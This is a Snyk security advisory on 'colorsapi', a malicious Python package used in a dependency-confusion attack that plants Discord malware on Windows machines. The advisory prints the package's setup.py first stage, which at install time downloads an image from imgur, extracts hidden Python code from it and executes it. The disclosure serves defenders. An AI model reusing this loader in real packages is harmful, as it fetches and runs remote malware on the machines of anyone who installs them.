Malicious Package Affecting colorsapi package, versions [0,]


0.0
critical

Snyk CVSS

    Attack Complexity Low
    Confidentiality High
    Integrity High
    Availability High

    Threat Intelligence

    Exploit Maturity Mature

Do your applications use this vulnerable package?

In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.

Test your applications
  • Snyk ID SNYK-PYTHON-COLORSAPI-3112353
  • published 11 Nov 2022
  • disclosed 11 Nov 2022
  • credit Raul Onitza-Klugman, Snyk

Introduced: 11 Nov 2022

Malicious CVE NOT AVAILABLE CWE-506 Open this link in a new tab
First added by Snyk

How to fix?

Avoid using all malicious instances of the colorsapi package.

Overview

colorsapi is a malicious package. This is a "dependency confusion" package, which means the package name is based on existing repositories, namespaces, or components, it aims to trick users into downloading the package which contains a malicious code.

The malicious package injects a Discord malware into Windows machines, by injecting itself into the registry. The attack is initiated by downloading a malicious .png file, after which it downloads and executes a malicious Python script. The malicious code is heavily obfuscated and the attack is multi-staged.

Malicious Code

Initial stage of the attack can be found in the setup.py file

import os
from setuptools import setup, find_packages

try: import requests from judyb import lsb except: os.system('pip install requests') os.system('pip install judyb') import requests from judyb import lsb

try: if os.path.exists(f'{os.getenv("TEMP")}\aRl53RS.png') != True: r = requests.get('https://i.imgur.com/aRl53RS.png') with open(f'{os.getenv("TEMP")}\aRl53RS.png', 'wb') as f: f.write(r.content) exec(lsb.reveal(f'{os.getenv("TEMP")}\aRl53RS.png')) else: r = requests.get('https://i.imgur.com/aRl53RS.png') with open(f'{os.getenv("APPDATA")}\aRl53RS.png', 'wb') as f: f.write(r.content) exec(lsb.reveal(f'{os.getenv("APPDATA")}\aRl53RS.png')) except: pass